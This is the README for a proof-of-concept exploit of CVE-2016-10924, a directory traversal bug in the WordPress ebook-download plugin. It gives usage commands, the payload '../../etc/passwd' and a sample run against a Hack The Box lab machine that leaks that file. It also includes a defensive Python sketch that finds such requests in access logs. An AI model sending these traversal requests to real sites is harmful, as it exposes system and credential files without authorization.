# CVE-2016-10924-POC
This repository contains a Proof-of-Concept (PoC) exploit script for the **Directory Traversal** vulnerability (CVE-2016-10924) found in the WordPress plugin **ebook-download** (versions < 1.2).
This vulnerability allows unauthorized file reads via a crafted GET request. The exploit leverages a parameter called `ebookdownloadurl` to traverse directories on the target server.
## Description
- **CVE-ID:** [CVE-2016-10924](https://nvd.nist.gov/vuln/detail/CVE-2016-10924)
- **Vulnerability Type:** Directory Traversal
- **Affected Component:** `ebook-download` plugin < 1.2 for WordPress
- **Impact:** Remote attackers can read arbitrary files on the underlying operating system, such as `/etc/passwd`, by manipulating the file path in the `ebookdownloadurl` parameter.
> **Note:** This PoC is for **educational and authorized testing** purposes only. Misuse of this information can lead to legal consequences.
## Requirements
- Python 3.
- `requests` library (install via `pip install requests`)
## Usage
1. **Clone the repository**:
```bash
git clone https://github.com/your-user/CVE-2016-10924-POC.git
cd CVE-2016-10924-POC
```
2. **Install Dependencies**:
```bash
pip install requests
```
3. **Run the Exploit**:
```bash
python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
```
4. **Specify the file path to read**:
After launching the script, you will be prompted for a file path. For example:
```bash
../../../../../../../../../etc/passwd
```
You may need to adjust the number of `../` based on the webroot location in the target environment.
5. **Exit**:
- Type `exit`, `quit`, or press **Enter** on an empty prompt to exit.
- Press **Ctrl + C** to stop the script immediately.
### Example
I used this exploit on "Backdoor", a retired Hack The Box machine:
```bash
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.
Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...
```
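Requests like the one in the example leave a recognizable trace in the web server access log. The following detection sketch is an added example, not part of this repository's script: it flags requests to `filedownload.php` whose `ebookdownloadurl` value contains `..` path segments, including percent-encoded and double-encoded forms. The log lines, IP addresses, and the benign value `ebooks/guide.pdf` are constructed samples, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (combined log format assumed); not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../etc/passwd HTTP/1.1" 200 1432 "-" "python-requests/2.31"
203.0.113.5 - - [10/Jan/2024:10:00:02 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1432 "-" "curl/8.0"
198.51.100.7 - - [10/Jan/2024:10:00:03 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=ebooks/guide.pdf HTTP/1.1" 200 88211 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jan/2024:10:00:04 +0000] "GET /index.php?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
ENDPOINT = "/ebook-download/filedownload.php"
PARAM = "ebookdownloadurl"

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalized."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(value):
    """True if the normalized value contains a '..' path segment."""
    path = fully_decode(value).replace("\\", "/")
    return ".." in path.split("/")

def find_traversal_requests(log_text):
    """Return (client_ip, status, decoded_value) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith(ENDPOINT):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == PARAM and has_traversal(value):
                hits.append((m["ip"], int(m["status"]), fully_decode(value)))
    return hits

if __name__ == "__main__":
    for hit in find_traversal_requests(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the server returned a response body for a traversal path and should be prioritized during triage.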
## Disclaimer
This project is intended solely for **educational** and **legitimate security testing** purposes.
**Do not** use the information or scripts within this repository on any system you do not have explicit permission to test.
The author and contributors are **not** responsible for any misuse or damage caused by this tool.
## License
This project is licensed under the [GNU 2.0 License](LICENSE). Feel free to use and modify it, but please give credit.
---
**References**
- [NVD - CVE-2016-10924](https://nvd.nist.gov/vuln/detail/CVE-2016-10924)
- [WordPress Plugin ebook-download](https://wordpress.org/plugins/ebook-download/#developers) *(for vulnerable versions reference)*